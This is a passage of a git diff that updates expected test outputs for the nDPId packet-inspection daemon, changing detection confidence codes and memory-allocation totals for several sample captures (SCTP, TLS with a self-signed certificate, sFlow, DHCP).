00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1088696689872,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1088696689872,"pkt":"AKCAAF5GAAGvDAaWCABFAAA4ykAAAECEj3QKHAYqChwGLAtZC1kAAA5QU8MFXwQAABgAAQAUQORLkgocBiwbZq9+AAAAAA=="} -00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00594{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1088696689872,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1088696689872,"pkt":"AAGvDAaWAKCAAF5GCABFAAA4u4FAAP+EnzIKHAYsChwGKgtZC1kNU+b+jI4HRgUAABgAAQAUQORLkgocBiwbZq9+AAAAAA=="} -00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} -00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00633{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689872,"flow_last_seen":1088696689872,"flow_idle_time":620000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.42","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} +00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1088696689784,"flow_last_seen":1088696689784,"flow_idle_time":620000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1088696689872,"l3_proto":"ip4","src_ip":"10.28.6.43","dst_ip":"10.28.6.44","l4_proto":132,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SCTP","breed":"Acceptable","category":"Network"}} 00548{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"sctp.cap","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":204,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1088696689872} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -19,9 +19,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870619 bytes -~~ total memory freed........: 5870619 bytes -~~ total allocations/frees...: 118122/118122 +~~ total memory allocated....: 6004253 bytes +~~ total memory freed........: 6004253 bytes +~~ total allocations/frees...: 120884/120884 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 459 chars ~~ json string max len.......: 640 chars diff --git a/test/results/selfsigned.pcap.out b/test/results/selfsigned.pcap.out index 28b2c5b23..d79c4f106 100644 --- a/test/results/selfsigned.pcap.out +++ b/test/results/selfsigned.pcap.out @@ -4,9 +4,9 @@ 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1588921646472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubiYAAAAAsAL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4AAAAAAQCAAA="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1588921646472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":68,"pkt_l4_len":44,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAAEAAAEAAQAYAAH8AAAF\/AAABC7nJlxL1FVDN7m4nsBL\/\/\/40AAACBD\/YAQMDBQEBCAoTf8z4E3\/M+AQCAAA="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1588921646472,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":4,"pkt_l4_offset":24,"pkt_len":56,"pkt_l4_len":32,"thread_ts_msec":1588921646472,"pkt":"AgAAAEUAADQAAEAAQAYAAH8AAAF\/AAAByZcLuc3ubicS9RVRgBAx1\/4oAAABAQgKE3\/M+BN\/zPg="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} -01017{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1588921646472,"flow_last_seen":1588921646479,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1588921646479,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01396{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1588921646472,"flow_last_seen":1588921646482,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":1874,"flow_avg_l4_payload_len":267,"midstream":0,"thread_ts_msec":1588921646482,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"localhost","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=IT, ST=Some-State, O=ntop.org","subjectDN":"C=IT, ST=Some-State, O=ntop.org","alpn":"h2,http\/1.1","fingerprint":"AF:CC:98:49:F2:00:0E:05:21:18:6C:77:5F:2A:CF:10:44:6E:D8:8B"}} +01017{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1588921646472,"flow_last_seen":1588921646517,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1357,"flow_tot_l4_payload_len":2634,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1588921646517,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51607,"dst_port":3001,"l4_proto":"tcp","flow_datalink":0,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Cert","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"9": {"risk":"TLS Cert Expired","severity":"High","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":20,"source":"selfsigned.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":20,"total-skipped-flows":0,"total-l4-payload-len":2634,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1588921646517} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 20/20 @@ -16,9 +16,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880431 bytes -~~ total memory freed........: 5880431 bytes -~~ total allocations/frees...: 118142/118142 +~~ total memory allocated....: 6014065 bytes +~~ total memory freed........: 6014065 bytes +~~ total allocations/frees...: 120904/120904 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1401 chars diff --git a/test/results/sflow.pcap.out b/test/results/sflow.pcap.out index 04734b12f..9cf4ff4f7 100644 --- a/test/results/sflow.pcap.out +++ b/test/results/sflow.pcap.out @@ -3,9 +3,9 @@ 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1378125488790,"flow_last_seen":1378125488790,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1378125488790,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1378125488790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1378125488790,"pkt":"AFBWlgDZAOCxz5TDCABFAACsIfoAAEARuUSsFSMRrBUjxwQDGMcAmAAAAAAABQAAAAGsFSMRAAAAAQAAAZ9nPdcQAAAAAQAAAAIAAABsAAAhJQAABAwAAAABAAAAAQAAAFgAAAQMAAAABgAAAAAF9eEAAAAAAQAAAAMAAAAAAYwszAAAm4MAApAWAAH2cwAAAAAAAAAAAAAAAAAAAAAAUz3BAACgtwAAIYcAAAjXAAAAAAAAAAAAAAAA"} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1378125507793,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1378125507793,"pkt":"AFBWlgDZAOCxz5TDCABFAACsIfsAAEARuUOsFSMRrBUjxwQDGMcAmAAAAAAABQAAAAGsFSMRAAAAAQAAAaBnPiFIAAAAAQAAAAIAAABsAAAAaAAABBMAAAABAAAAAQAAAFgAAAQTAAAABgAAAAAF9eEAAAAAAQAAAAMAAAAAAwmHZAAAPY8ACrt0AAAffQAAAAAAAAAAAAAAAAAAAAAGHWdKAABT9wAJE0IACVxYAAAAAAAAAAAAAAAA"} -00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1378125488790,"flow_last_seen":1378125507793,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1378125507793,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1378125488790,"flow_last_seen":1378125507793,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1378125507793,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} 00624{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1378125518792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":186,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":186,"pkt_l4_len":152,"thread_ts_msec":1378125518792,"pkt":"AFBWlgDZAOCxz5TDCABFAACsIfwAAEARuUKsFSMRrBUjxwQDGMcAmAAAAAAABQAAAAGsFSMRAAAAAQAAAaFnPkxAAAAAAQAAAAIAAABsAAAhJgAABAwAAAABAAAAAQAAAFgAAAQMAAAABgAAAAAF9eEAAAAAAQAAAAMAAAAAAYw+XwAAm4gAApAuAAH2kQAAAAAAAAAAAAAAAAAAAAAAU0E5AACgvgAAIYgAAAjXAAAAAAAAAAAAAAAA"} -00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1378125488790,"flow_last_seen":1378125597799,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1378125597799,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9,"source":"sflow.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1378125488790,"flow_last_seen":1378125597799,"flow_idle_time":200000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":1324,"flow_avg_l4_payload_len":147,"midstream":0,"thread_ts_msec":1378125597799,"l3_proto":"ip4","src_ip":"172.21.35.17","dst_ip":"172.21.35.199","src_port":1027,"dst_port":6343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"sFlow","breed":"Acceptable","category":"Network"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9,"source":"sflow.pcap","alias":"nDPId-test","packets-captured":9,"packets-processed":9,"total-skipped-flows":0,"total-l4-payload-len":1324,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1378125597799} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 9/9 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869704 bytes -~~ total memory freed........: 5869704 bytes -~~ total allocations/frees...: 118123/118123 +~~ total memory allocated....: 6003338 bytes +~~ total memory freed........: 6003338 bytes +~~ total allocations/frees...: 120885/120885 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 685 chars diff --git a/test/results/signal.pcap.out b/test/results/signal.pcap.out index a5a3685b7..cd0a618a0 100644 --- a/test/results/signal.pcap.out +++ b/test/results/signal.pcap.out @@ -2,10 +2,10 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569051245838} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00847{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569051245838,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1569051245838,"pkt":"\/\/\/\/\/\/\/\/2DBiVgAcCABFAAFIKS8AAP8RkXYAAAAA\/\/\/\/\/wBEAEMBNJxAAQEGACG6jqoAAQAAAAAAAAAAAAAAAAAAAAAAANgwYlYAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBNwoBeQMGD3f8XywuOQIF3D0HAdgwYlYAHDMEAHanAAwKTHVjYXMtaU1hY\/8AAAAAAAAAAAAAAAAA"} -00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} +00730{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"signal.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051245838,"flow_last_seen":1569051245838,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1569051245838,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"lucas-imac","fingerprint":"1,121,3,6,15,119,252,95,44,46","class_ident":""}} 